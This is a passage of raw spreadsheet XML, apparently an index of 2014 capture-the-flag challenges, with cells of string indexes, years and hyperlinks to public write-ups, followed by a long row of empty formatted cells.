      <c r="G61" s="44" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B62" s="43">
        <v>2014.0</v>
      </c>
      <c r="C62" s="5" t="s">
        <v>969</v>
      </c>
      <c r="D62" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E62" s="3"/>
      <c r="F62" s="5" t="s">
        <v>970</v>
      </c>
      <c r="G62" s="44" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B63" s="43">
        <v>2014.0</v>
      </c>
      <c r="C63" s="5" t="s">
        <v>972</v>
      </c>
      <c r="D63" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E63" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F63" s="5" t="s">
        <v>974</v>
      </c>
      <c r="G63" s="48" t="s">
        <v>977</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B64" s="43">
        <v>2014.0</v>
      </c>
      <c r="C64" s="5" t="s">
        <v>988</v>
      </c>
      <c r="D64" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E64" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F64" s="5" t="s">
        <v>989</v>
      </c>
      <c r="G64" s="44" t="s">
        <v>381</v>
      </c>
      <c r="H64" s="30"/>
    </row>
    <row r="65">
      <c r="A65" s="36">
        <v>9447.0</v>
      </c>
      <c r="B65" s="36">
        <v>2014.0</v>
      </c>
      <c r="C65" s="36" t="s">
        <v>995</v>
      </c>
      <c r="D65" s="36" t="s">
        <v>996</v>
      </c>
      <c r="E65" s="47" t="s">
        <v>997</v>
      </c>
      <c r="F65" s="45" t="s">
        <v>998</v>
      </c>
      <c r="G65" s="45" t="s">
        <v>1000</v>
      </c>
      <c r="H65" s="36" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="36">
        <v>9477.0</v>
      </c>
      <c r="B66" s="36">
        <v>2014.0</v>
      </c>
      <c r="C66" s="36" t="s">
        <v>1013</v>
      </c>
      <c r="D66" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E66" s="47" t="s">
        <v>997</v>
      </c>
      <c r="F66" s="45" t="s">
        <v>998</v>
      </c>
      <c r="G66" s="47" t="s">
        <v>1014</v>
      </c>
      <c r="H66" s="68"/>
    </row>
    <row r="67">
      <c r="A67" s="36">
        <v>9477.0</v>
      </c>
      <c r="B67" s="36">
        <v>2014.0</v>
      </c>
      <c r="C67" s="36" t="s">
        <v>1022</v>
      </c>
      <c r="D67" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E67" s="47" t="s">
        <v>997</v>
      </c>
      <c r="F67" s="45" t="s">
        <v>998</v>
      </c>
      <c r="G67" s="47" t="s">
        <v>1014</v>
      </c>
      <c r="H67" s="46" t="str">
        <f>HYPERLINK("https://kitctf.de/writeups/9447ctf2014/europe-writeup/","Europe writeup")</f>
        <v>Europe writeup</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="36">
        <v>9477.0</v>
      </c>
      <c r="B68" s="36">
        <v>2014.0</v>
      </c>
      <c r="C68" s="36" t="s">
        <v>1039</v>
      </c>
      <c r="D68" s="36" t="s">
        <v>508</v>
      </c>
      <c r="E68" s="36" t="s">
        <v>300</v>
      </c>
      <c r="F68" s="45" t="s">
        <v>1041</v>
      </c>
      <c r="G68" s="36" t="s">
        <v>1043</v>
      </c>
      <c r="H68" s="46" t="str">
        <f>HYPERLINK("http://blog.germano.io/2014/fuckpyjails-writeup-9447-ctf/","fuckpyjails writeup")</f>
        <v>fuckpyjails writeup</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="36">
        <v>9447.0</v>
      </c>
      <c r="B69" s="36">
        <v>2014.0</v>
      </c>
      <c r="C69" s="36" t="s">
        <v>1050</v>
      </c>
      <c r="D69" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E69" s="36"/>
      <c r="F69" s="45" t="s">
        <v>1051</v>
      </c>
      <c r="G69" s="45" t="s">
        <v>1052</v>
      </c>
      <c r="H69" s="46" t="str">
        <f>HYPERLINK("http://www.lemis.com/grog/Documentation/Lions/book.pdf","Unix Documentation")</f>
        <v>Unix Documentation</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B70" s="31">
        <v>2014.0</v>
      </c>
      <c r="C70" s="30" t="s">
        <v>1066</v>
      </c>
      <c r="D70" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E70" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F70" s="35" t="s">
        <v>1070</v>
      </c>
      <c r="G70" s="32" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="17">
        <v>42521.0</v>
      </c>
      <c r="B71" s="7"/>
      <c r="C71" s="6"/>
      <c r="D71" s="6"/>
      <c r="E71" s="6"/>
      <c r="F71" s="6"/>
      <c r="G71" s="6"/>
      <c r="H71" s="6"/>
      <c r="I71" s="8"/>
      <c r="J71" s="8"/>
      <c r="K71" s="9"/>
      <c r="L71" s="9"/>
      <c r="M71" s="9"/>
      <c r="N71" s="9"/>
      <c r="O71" s="9"/>
      <c r="P71" s="9"/>
      <c r="Q71" s="9"/>
      <c r="R71" s="9"/>
      <c r="S71" s="9"/>
      <c r="T71" s="9"/>
      <c r="U71" s="9"/>
      <c r="V71" s="9"/>
      <c r="W71" s="9"/>
      <c r="X71" s="9"/>
      <c r="Y71" s="9"/>
      <c r="Z71" s="9"/>
      <c r="AA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AB71" s="7"/>
      <c r="AC71" s="6"/>
      <c r="AD71" s="6"/>
      <c r="AE71" s="6"/>
      <c r="AF71" s="6"/>
      <c r="AG71" s="6"/>
      <c r="AH71" s="6"/>
      <c r="AI71" s="8"/>
      <c r="AJ71" s="8"/>
      <c r="AK71" s="9"/>
      <c r="AL71" s="9"/>
      <c r="AM71" s="9"/>
      <c r="AN71" s="9"/>
      <c r="AO71" s="9"/>
      <c r="AP71" s="9"/>
      <c r="AQ71" s="9"/>
      <c r="AR71" s="9"/>
      <c r="AS71" s="9"/>
      <c r="AT71" s="9"/>
      <c r="AU71" s="9"/>
      <c r="AV71" s="9"/>
      <c r="AW71" s="9"/>
      <c r="AX71" s="9"/>
      <c r="AY71" s="9"/>
      <c r="AZ71" s="9"/>
      <c r="BA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="BB71" s="7"/>
      <c r="BC71" s="6"/>
      <c r="BD71" s="6"/>
      <c r="BE71" s="6"/>
      <c r="BF71" s="6"/>
      <c r="BG71" s="6"/>
      <c r="BH71" s="6"/>
      <c r="BI71" s="8"/>
      <c r="BJ71" s="8"/>
      <c r="BK71" s="9"/>
      <c r="BL71" s="9"/>
      <c r="BM71" s="9"/>
      <c r="BN71" s="9"/>
      <c r="BO71" s="9"/>
      <c r="BP71" s="9"/>
      <c r="BQ71" s="9"/>
      <c r="BR71" s="9"/>
      <c r="BS71" s="9"/>
      <c r="BT71" s="9"/>
      <c r="BU71" s="9"/>
      <c r="BV71" s="9"/>
      <c r="BW71" s="9"/>
      <c r="BX71" s="9"/>
      <c r="BY71" s="9"/>
      <c r="BZ71" s="9"/>
      <c r="CA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="CB71" s="7"/>
      <c r="CC71" s="6"/>
      <c r="CD71" s="6"/>
      <c r="CE71" s="6"/>
      <c r="CF71" s="6"/>
      <c r="CG71" s="6"/>
      <c r="CH71" s="6"/>
      <c r="CI71" s="8"/>
      <c r="CJ71" s="8"/>
      <c r="CK71" s="9"/>
      <c r="CL71" s="9"/>
      <c r="CM71" s="9"/>
      <c r="CN71" s="9"/>
      <c r="CO71" s="9"/>
      <c r="CP71" s="9"/>
      <c r="CQ71" s="9"/>
      <c r="CR71" s="9"/>
      <c r="CS71" s="9"/>
      <c r="CT71" s="9"/>
      <c r="CU71" s="9"/>
      <c r="CV71" s="9"/>
      <c r="CW71" s="9"/>
      <c r="CX71" s="9"/>
      <c r="CY71" s="9"/>
      <c r="CZ71" s="9"/>
      <c r="DA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="DB71" s="7"/>
      <c r="DC71" s="6"/>
      <c r="DD71" s="6"/>
      <c r="DE71" s="6"/>
      <c r="DF71" s="6"/>
      <c r="DG71" s="6"/>
      <c r="DH71" s="6"/>
      <c r="DI71" s="8"/>
      <c r="DJ71" s="8"/>
      <c r="DK71" s="9"/>
      <c r="DL71" s="9"/>
      <c r="DM71" s="9"/>
      <c r="DN71" s="9"/>
      <c r="DO71" s="9"/>
      <c r="DP71" s="9"/>
      <c r="DQ71" s="9"/>
      <c r="DR71" s="9"/>
      <c r="DS71" s="9"/>
      <c r="DT71" s="9"/>
      <c r="DU71" s="9"/>
      <c r="DV71" s="9"/>
      <c r="DW71" s="9"/>
      <c r="DX71" s="9"/>
      <c r="DY71" s="9"/>
      <c r="DZ71" s="9"/>
      <c r="EA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="EB71" s="7"/>
      <c r="EC71" s="6"/>
      <c r="ED71" s="6"/>
      <c r="EE71" s="6"/>
      <c r="EF71" s="6"/>
      <c r="EG71" s="6"/>
      <c r="EH71" s="6"/>
      <c r="EI71" s="8"/>
      <c r="EJ71" s="8"/>
      <c r="EK71" s="9"/>
      <c r="EL71" s="9"/>
      <c r="EM71" s="9"/>
      <c r="EN71" s="9"/>
      <c r="EO71" s="9"/>
      <c r="EP71" s="9"/>
      <c r="EQ71" s="9"/>
      <c r="ER71" s="9"/>
      <c r="ES71" s="9"/>
      <c r="ET71" s="9"/>
      <c r="EU71" s="9"/>
      <c r="EV71" s="9"/>
      <c r="EW71" s="9"/>
      <c r="EX71" s="9"/>
      <c r="EY71" s="9"/>
      <c r="EZ71" s="9"/>
      <c r="FA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="FB71" s="7"/>
      <c r="FC71" s="6"/>
      <c r="FD71" s="6"/>
      <c r="FE71" s="6"/>
      <c r="FF71" s="6"/>
      <c r="FG71" s="6"/>
      <c r="FH71" s="6"/>
      <c r="FI71" s="8"/>
      <c r="FJ71" s="8"/>
      <c r="FK71" s="9"/>
      <c r="FL71" s="9"/>
      <c r="FM71" s="9"/>
      <c r="FN71" s="9"/>
      <c r="FO71" s="9"/>
      <c r="FP71" s="9"/>
      <c r="FQ71" s="9"/>
      <c r="FR71" s="9"/>
      <c r="FS71" s="9"/>
      <c r="FT71" s="9"/>
      <c r="FU71" s="9"/>
      <c r="FV71" s="9"/>
      <c r="FW71" s="9"/>
      <c r="FX71" s="9"/>
      <c r="FY71" s="9"/>
      <c r="FZ71" s="9"/>
      <c r="GA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="GB71" s="7"/>
      <c r="GC71" s="6"/>
      <c r="GD71" s="6"/>
      <c r="GE71" s="6"/>
      <c r="GF71" s="6"/>
      <c r="GG71" s="6"/>
      <c r="GH71" s="6"/>
      <c r="GI71" s="8"/>
      <c r="GJ71" s="8"/>
      <c r="GK71" s="9"/>
      <c r="GL71" s="9"/>
      <c r="GM71" s="9"/>
      <c r="GN71" s="9"/>
      <c r="GO71" s="9"/>
      <c r="GP71" s="9"/>
      <c r="GQ71" s="9"/>
      <c r="GR71" s="9"/>
      <c r="GS71" s="9"/>
      <c r="GT71" s="9"/>
      <c r="GU71" s="9"/>
      <c r="GV71" s="9"/>
      <c r="GW71" s="9"/>
      <c r="GX71" s="9"/>
      <c r="GY71" s="9"/>
      <c r="GZ71" s="9"/>
      <c r="HA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="HB71" s="7"/>
      <c r="HC71" s="6"/>
      <c r="HD71" s="6"/>
      <c r="HE71" s="6"/>
      <c r="HF71" s="6"/>
      <c r="HG71" s="6"/>
      <c r="HH71" s="6"/>
      <c r="HI71" s="8"/>
      <c r="HJ71" s="8"/>
      <c r="HK71" s="9"/>
      <c r="HL71" s="9"/>
      <c r="HM71" s="9"/>
      <c r="HN71" s="9"/>
      <c r="HO71" s="9"/>
      <c r="HP71" s="9"/>
      <c r="HQ71" s="9"/>
      <c r="HR71" s="9"/>
      <c r="HS71" s="9"/>
      <c r="HT71" s="9"/>
      <c r="HU71" s="9"/>
      <c r="HV71" s="9"/>
      <c r="HW71" s="9"/>
      <c r="HX71" s="9"/>
      <c r="HY71" s="9"/>
      <c r="HZ71" s="9"/>
      <c r="IA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="IB71" s="7"/>
      <c r="IC71" s="6"/>
      <c r="ID71" s="6"/>
      <c r="IE71" s="6"/>
      <c r="IF71" s="6"/>
      <c r="IG71" s="6"/>
      <c r="IH71" s="6"/>
      <c r="II71" s="8"/>
      <c r="IJ71" s="8"/>
      <c r="IK71" s="9"/>
      <c r="IL71" s="9"/>
      <c r="IM71" s="9"/>
      <c r="IN71" s="9"/>
      <c r="IO71" s="9"/>
      <c r="IP71" s="9"/>
      <c r="IQ71" s="9"/>
      <c r="IR71" s="9"/>
      <c r="IS71" s="9"/>
      <c r="IT71" s="9"/>
      <c r="IU71" s="9"/>
      <c r="IV71" s="9"/>
      <c r="IW71" s="9"/>
      <c r="IX71" s="9"/>
      <c r="IY71" s="9"/>
      <c r="IZ71" s="9"/>
      <c r="JA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="JB71" s="7"/>
      <c r="JC71" s="6"/>
      <c r="JD71" s="6"/>
      <c r="JE71" s="6"/>
      <c r="JF71" s="6"/>
      <c r="JG71" s="6"/>
      <c r="JH71" s="6"/>
      <c r="JI71" s="8"/>
      <c r="JJ71" s="8"/>
      <c r="JK71" s="9"/>
      <c r="JL71" s="9"/>
      <c r="JM71" s="9"/>
      <c r="JN71" s="9"/>
      <c r="JO71" s="9"/>
      <c r="JP71" s="9"/>
      <c r="JQ71" s="9"/>
      <c r="JR71" s="9"/>
      <c r="JS71" s="9"/>
      <c r="JT71" s="9"/>
      <c r="JU71" s="9"/>
      <c r="JV71" s="9"/>
      <c r="JW71" s="9"/>
      <c r="JX71" s="9"/>
      <c r="JY71" s="9"/>
      <c r="JZ71" s="9"/>
      <c r="KA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="KB71" s="7"/>
      <c r="KC71" s="6"/>
      <c r="KD71" s="6"/>
      <c r="KE71" s="6"/>
      <c r="KF71" s="6"/>
      <c r="KG71" s="6"/>
      <c r="KH71" s="6"/>
      <c r="KI71" s="8"/>
      <c r="KJ71" s="8"/>
      <c r="KK71" s="9"/>
      <c r="KL71" s="9"/>
      <c r="KM71" s="9"/>
      <c r="KN71" s="9"/>
      <c r="KO71" s="9"/>
      <c r="KP71" s="9"/>
      <c r="KQ71" s="9"/>
      <c r="KR71" s="9"/>
      <c r="KS71" s="9"/>
      <c r="KT71" s="9"/>
      <c r="KU71" s="9"/>
      <c r="KV71" s="9"/>
      <c r="KW71" s="9"/>
      <c r="KX71" s="9"/>
      <c r="KY71" s="9"/>
      <c r="KZ71" s="9"/>
      <c r="LA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="LB71" s="7"/>
      <c r="LC71" s="6"/>
      <c r="LD71" s="6"/>
      <c r="LE71" s="6"/>
      <c r="LF71" s="6"/>
      <c r="LG71" s="6"/>
      <c r="LH71" s="6"/>
      <c r="LI71" s="8"/>
      <c r="LJ71" s="8"/>
      <c r="LK71" s="9"/>
      <c r="LL71" s="9"/>
      <c r="LM71" s="9"/>
      <c r="LN71" s="9"/>
      <c r="LO71" s="9"/>
      <c r="LP71" s="9"/>
      <c r="LQ71" s="9"/>
      <c r="LR71" s="9"/>
      <c r="LS71" s="9"/>
      <c r="LT71" s="9"/>
      <c r="LU71" s="9"/>
      <c r="LV71" s="9"/>
      <c r="LW71" s="9"/>
      <c r="LX71" s="9"/>
      <c r="LY71" s="9"/>
      <c r="LZ71" s="9"/>
      <c r="MA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="MB71" s="7"/>
      <c r="MC71" s="6"/>
      <c r="MD71" s="6"/>
      <c r="ME71" s="6"/>
      <c r="MF71" s="6"/>
      <c r="MG71" s="6"/>
      <c r="MH71" s="6"/>
      <c r="MI71" s="8"/>
      <c r="MJ71" s="8"/>
      <c r="MK71" s="9"/>
      <c r="ML71" s="9"/>
      <c r="MM71" s="9"/>
      <c r="MN71" s="9"/>
      <c r="MO71" s="9"/>
      <c r="MP71" s="9"/>
      <c r="MQ71" s="9"/>
      <c r="MR71" s="9"/>
      <c r="MS71" s="9"/>
      <c r="MT71" s="9"/>
      <c r="MU71" s="9"/>
      <c r="MV71" s="9"/>
      <c r="MW71" s="9"/>
      <c r="MX71" s="9"/>
      <c r="MY71" s="9"/>
      <c r="MZ71" s="9"/>
      <c r="NA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="NB71" s="7"/>
      <c r="NC71" s="6"/>
      <c r="ND71" s="6"/>
      <c r="NE71" s="6"/>
      <c r="NF71" s="6"/>
      <c r="NG71" s="6"/>
      <c r="NH71" s="6"/>
      <c r="NI71" s="8"/>
      <c r="NJ71" s="8"/>
      <c r="NK71" s="9"/>
      <c r="NL71" s="9"/>
      <c r="NM71" s="9"/>
      <c r="NN71" s="9"/>
      <c r="NO71" s="9"/>
      <c r="NP71" s="9"/>
      <c r="NQ71" s="9"/>
      <c r="NR71" s="9"/>
      <c r="NS71" s="9"/>
      <c r="NT71" s="9"/>
      <c r="NU71" s="9"/>
      <c r="NV71" s="9"/>
      <c r="NW71" s="9"/>
      <c r="NX71" s="9"/>
      <c r="NY71" s="9"/>
      <c r="NZ71" s="9"/>
      <c r="OA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="OB71" s="7"/>
      <c r="OC71" s="6"/>
      <c r="OD71" s="6"/>
      <c r="OE71" s="6"/>
      <c r="OF71" s="6"/>
      <c r="OG71" s="6"/>
      <c r="OH71" s="6"/>
      <c r="OI71" s="8"/>
      <c r="OJ71" s="8"/>
      <c r="OK71" s="9"/>
      <c r="OL71" s="9"/>
      <c r="OM71" s="9"/>
      <c r="ON71" s="9"/>
      <c r="OO71" s="9"/>
      <c r="OP71" s="9"/>
      <c r="OQ71" s="9"/>
      <c r="OR71" s="9"/>
      <c r="OS71" s="9"/>
      <c r="OT71" s="9"/>
      <c r="OU71" s="9"/>
      <c r="OV71" s="9"/>
      <c r="OW71" s="9"/>
      <c r="OX71" s="9"/>
      <c r="OY71" s="9"/>
      <c r="OZ71" s="9"/>
      <c r="PA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="PB71" s="7"/>
      <c r="PC71" s="6"/>
      <c r="PD71" s="6"/>
      <c r="PE71" s="6"/>
      <c r="PF71" s="6"/>
      <c r="PG71" s="6"/>
      <c r="PH71" s="6"/>
      <c r="PI71" s="8"/>
      <c r="PJ71" s="8"/>
      <c r="PK71" s="9"/>
      <c r="PL71" s="9"/>
      <c r="PM71" s="9"/>
      <c r="PN71" s="9"/>
      <c r="PO71" s="9"/>
      <c r="PP71" s="9"/>
      <c r="PQ71" s="9"/>
      <c r="PR71" s="9"/>
      <c r="PS71" s="9"/>
      <c r="PT71" s="9"/>
      <c r="PU71" s="9"/>
      <c r="PV71" s="9"/>
      <c r="PW71" s="9"/>
      <c r="PX71" s="9"/>
      <c r="PY71" s="9"/>
      <c r="PZ71" s="9"/>
      <c r="QA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="QB71" s="7"/>
      <c r="QC71" s="6"/>
      <c r="QD71" s="6"/>
      <c r="QE71" s="6"/>
      <c r="QF71" s="6"/>
      <c r="QG71" s="6"/>
      <c r="QH71" s="6"/>
      <c r="QI71" s="8"/>
      <c r="QJ71" s="8"/>
      <c r="QK71" s="9"/>
      <c r="QL71" s="9"/>
      <c r="QM71" s="9"/>
      <c r="QN71" s="9"/>
      <c r="QO71" s="9"/>
      <c r="QP71" s="9"/>
      <c r="QQ71" s="9"/>
      <c r="QR71" s="9"/>
      <c r="QS71" s="9"/>
      <c r="QT71" s="9"/>
      <c r="QU71" s="9"/>
      <c r="QV71" s="9"/>
      <c r="QW71" s="9"/>
      <c r="QX71" s="9"/>
      <c r="QY71" s="9"/>
      <c r="QZ71" s="9"/>
      <c r="RA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="RB71" s="7"/>
      <c r="RC71" s="6"/>
      <c r="RD71" s="6"/>
      <c r="RE71" s="6"/>
      <c r="RF71" s="6"/>
      <c r="RG71" s="6"/>
      <c r="RH71" s="6"/>
      <c r="RI71" s="8"/>
      <c r="RJ71" s="8"/>
      <c r="RK71" s="9"/>
      <c r="RL71" s="9"/>
      <c r="RM71" s="9"/>
      <c r="RN71" s="9"/>
      <c r="RO71" s="9"/>
      <c r="RP71" s="9"/>
      <c r="RQ71" s="9"/>
      <c r="RR71" s="9"/>
      <c r="RS71" s="9"/>
      <c r="RT71" s="9"/>
      <c r="RU71" s="9"/>
      <c r="RV71" s="9"/>
      <c r="RW71" s="9"/>
      <c r="RX71" s="9"/>
      <c r="RY71" s="9"/>
      <c r="RZ71" s="9"/>
      <c r="SA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="SB71" s="7"/>
      <c r="SC71" s="6"/>
      <c r="SD71" s="6"/>
      <c r="SE71" s="6"/>
      <c r="SF71" s="6"/>
      <c r="SG71" s="6"/>
      <c r="SH71" s="6"/>
      <c r="SI71" s="8"/>
      <c r="SJ71" s="8"/>
      <c r="SK71" s="9"/>
      <c r="SL71" s="9"/>
      <c r="SM71" s="9"/>
      <c r="SN71" s="9"/>
      <c r="SO71" s="9"/>
      <c r="SP71" s="9"/>
      <c r="SQ71" s="9"/>
      <c r="SR71" s="9"/>
      <c r="SS71" s="9"/>
      <c r="ST71" s="9"/>
      <c r="SU71" s="9"/>
      <c r="SV71" s="9"/>
      <c r="SW71" s="9"/>
      <c r="SX71" s="9"/>
      <c r="SY71" s="9"/>
      <c r="SZ71" s="9"/>
      <c r="TA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="TB71" s="7"/>
      <c r="TC71" s="6"/>
      <c r="TD71" s="6"/>
      <c r="TE71" s="6"/>
      <c r="TF71" s="6"/>
      <c r="TG71" s="6"/>
      <c r="TH71" s="6"/>
      <c r="TI71" s="8"/>
      <c r="TJ71" s="8"/>
      <c r="TK71" s="9"/>
      <c r="TL71" s="9"/>
      <c r="TM71" s="9"/>
      <c r="TN71" s="9"/>
      <c r="TO71" s="9"/>
      <c r="TP71" s="9"/>
      <c r="TQ71" s="9"/>
      <c r="TR71" s="9"/>
      <c r="TS71" s="9"/>
      <c r="TT71" s="9"/>
      <c r="TU71" s="9"/>
      <c r="TV71" s="9"/>
      <c r="TW71" s="9"/>
      <c r="TX71" s="9"/>
      <c r="TY71" s="9"/>
      <c r="TZ71" s="9"/>
      <c r="UA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="UB71" s="7"/>
      <c r="UC71" s="6"/>
      <c r="UD71" s="6"/>
      <c r="UE71" s="6"/>
      <c r="UF71" s="6"/>
      <c r="UG71" s="6"/>
      <c r="UH71" s="6"/>
      <c r="UI71" s="8"/>
      <c r="UJ71" s="8"/>
      <c r="UK71" s="9"/>
      <c r="UL71" s="9"/>
      <c r="UM71" s="9"/>
      <c r="UN71" s="9"/>
      <c r="UO71" s="9"/>
      <c r="UP71" s="9"/>
      <c r="UQ71" s="9"/>
      <c r="UR71" s="9"/>
      <c r="US71" s="9"/>
      <c r="UT71" s="9"/>
      <c r="UU71" s="9"/>
      <c r="UV71" s="9"/>
      <c r="UW71" s="9"/>
      <c r="UX71" s="9"/>
      <c r="UY71" s="9"/>
      <c r="UZ71" s="9"/>
      <c r="VA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="VB71" s="7"/>
      <c r="VC71" s="6"/>
      <c r="VD71" s="6"/>
      <c r="VE71" s="6"/>
      <c r="VF71" s="6"/>
      <c r="VG71" s="6"/>
      <c r="VH71" s="6"/>
      <c r="VI71" s="8"/>
      <c r="VJ71" s="8"/>
      <c r="VK71" s="9"/>
      <c r="VL71" s="9"/>
      <c r="VM71" s="9"/>
      <c r="VN71" s="9"/>
      <c r="VO71" s="9"/>
      <c r="VP71" s="9"/>
      <c r="VQ71" s="9"/>
      <c r="VR71" s="9"/>
      <c r="VS71" s="9"/>
      <c r="VT71" s="9"/>
      <c r="VU71" s="9"/>
      <c r="VV71" s="9"/>
      <c r="VW71" s="9"/>
      <c r="VX71" s="9"/>
      <c r="VY71" s="9"/>
      <c r="VZ71" s="9"/>
      <c r="WA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="WB71" s="7"/>
      <c r="WC71" s="6"/>
      <c r="WD71" s="6"/>
      <c r="WE71" s="6"/>
      <c r="WF71" s="6"/>
      <c r="WG71" s="6"/>
      <c r="WH71" s="6"/>
      <c r="WI71" s="8"/>
      <c r="WJ71" s="8"/>
      <c r="WK71" s="9"/>
      <c r="WL71" s="9"/>
      <c r="WM71" s="9"/>
      <c r="WN71" s="9"/>
      <c r="WO71" s="9"/>
      <c r="WP71" s="9"/>
      <c r="WQ71" s="9"/>
      <c r="WR71" s="9"/>
      <c r="WS71" s="9"/>
      <c r="WT71" s="9"/>
      <c r="WU71" s="9"/>
      <c r="WV71" s="9"/>
      <c r="WW71" s="9"/>
      <c r="WX71" s="9"/>
      <c r="WY71" s="9"/>
      <c r="WZ71" s="9"/>
      <c r="XA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="XB71" s="7"/>
      <c r="XC71" s="6"/>
      <c r="XD71" s="6"/>
      <c r="XE71" s="6"/>
      <c r="XF71" s="6"/>
      <c r="XG71" s="6"/>
      <c r="XH71" s="6"/>
      <c r="XI71" s="8"/>
      <c r="XJ71" s="8"/>
      <c r="XK71" s="9"/>
      <c r="XL71" s="9"/>
      <c r="XM71" s="9"/>
      <c r="XN71" s="9"/>
      <c r="XO71" s="9"/>
      <c r="XP71" s="9"/>
      <c r="XQ71" s="9"/>
      <c r="XR71" s="9"/>
      <c r="XS71" s="9"/>
      <c r="XT71" s="9"/>
      <c r="XU71" s="9"/>
      <c r="XV71" s="9"/>
      <c r="XW71" s="9"/>
      <c r="XX71" s="9"/>
      <c r="XY71" s="9"/>
      <c r="XZ71" s="9"/>
      <c r="YA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="YB71" s="7"/>
      <c r="YC71" s="6"/>
      <c r="YD71" s="6"/>
      <c r="YE71" s="6"/>
      <c r="YF71" s="6"/>
      <c r="YG71" s="6"/>
      <c r="YH71" s="6"/>
      <c r="YI71" s="8"/>
      <c r="YJ71" s="8"/>
      <c r="YK71" s="9"/>
      <c r="YL71" s="9"/>
      <c r="YM71" s="9"/>
      <c r="YN71" s="9"/>
      <c r="YO71" s="9"/>
      <c r="YP71" s="9"/>
      <c r="YQ71" s="9"/>
      <c r="YR71" s="9"/>
      <c r="YS71" s="9"/>
      <c r="YT71" s="9"/>
      <c r="YU71" s="9"/>
      <c r="YV71" s="9"/>
      <c r="YW71" s="9"/>
      <c r="YX71" s="9"/>
      <c r="YY71" s="9"/>
      <c r="YZ71" s="9"/>
      <c r="ZA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="ZB71" s="7"/>
      <c r="ZC71" s="6"/>
      <c r="ZD71" s="6"/>
      <c r="ZE71" s="6"/>
      <c r="ZF71" s="6"/>
      <c r="ZG71" s="6"/>
      <c r="ZH71" s="6"/>
      <c r="ZI71" s="8"/>
      <c r="ZJ71" s="8"/>
      <c r="ZK71" s="9"/>
      <c r="ZL71" s="9"/>
      <c r="ZM71" s="9"/>
      <c r="ZN71" s="9"/>
      <c r="ZO71" s="9"/>
      <c r="ZP71" s="9"/>
      <c r="ZQ71" s="9"/>
      <c r="ZR71" s="9"/>
      <c r="ZS71" s="9"/>
      <c r="ZT71" s="9"/>
      <c r="ZU71" s="9"/>
      <c r="ZV71" s="9"/>
      <c r="ZW71" s="9"/>
      <c r="ZX71" s="9"/>
      <c r="ZY71" s="9"/>
      <c r="ZZ71" s="9"/>
      <c r="AAA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="AAB71" s="7"/>
      <c r="AAC71" s="6"/>
      <c r="AAD71" s="6"/>
      <c r="AAE71" s="6"/>
      <c r="AAF71" s="6"/>
      <c r="AAG71" s="6"/>
      <c r="AAH71" s="6"/>
      <c r="AAI71" s="8"/>
      <c r="AAJ71" s="8"/>
      <c r="AAK71" s="9"/>
      <c r="AAL71" s="9"/>
      <c r="AAM71" s="9"/>
      <c r="AAN71" s="9"/>
      <c r="AAO71" s="9"/>
      <c r="AAP71" s="9"/>
      <c r="AAQ71" s="9"/>
      <c r="AAR71" s="9"/>
      <c r="AAS71" s="9"/>
      <c r="AAT71" s="9"/>
      <c r="AAU71" s="9"/>
      <c r="AAV71" s="9"/>
      <c r="AAW71" s="9"/>
      <c r="AAX71" s="9"/>
      <c r="AAY71" s="9"/>
      <c r="AAZ71" s="9"/>
      <c r="ABA71" s="17">
        <v>42521.0</v>
      </c>
      <c r="ABB71" s="7"/>
      <c r="ABC71" s="6"/>
      <c r="ABD71" s="6"/>
      <c r="ABE71" s="6"/>
      <c r="ABF71" s="6"/>
      <c r="ABG71" s="6"/>
      <c r="ABH71" s="6"/>
      <c r="ABI71" s="8"/>
      <c r="ABJ71" s="8"/>
      <c r="ABK71" s="9"/>
      <c r="ABL71" s="9"/>
      <c r="ABM71" s="9"/>
      <c r="ABN71" s="9"/>
      <c r="ABO71" s="9"/>
      <c r="ABP71" s="9"/>
      <c r="ABQ71" s="9"/>
      <c r="ABR71" s="9"/>
      <c r="ABS71" s="9"/>
      <c r="ABT71" s="9"/>
      <c r="ABU71" s="9"/>
      <c r="ABV71" s="9"/>
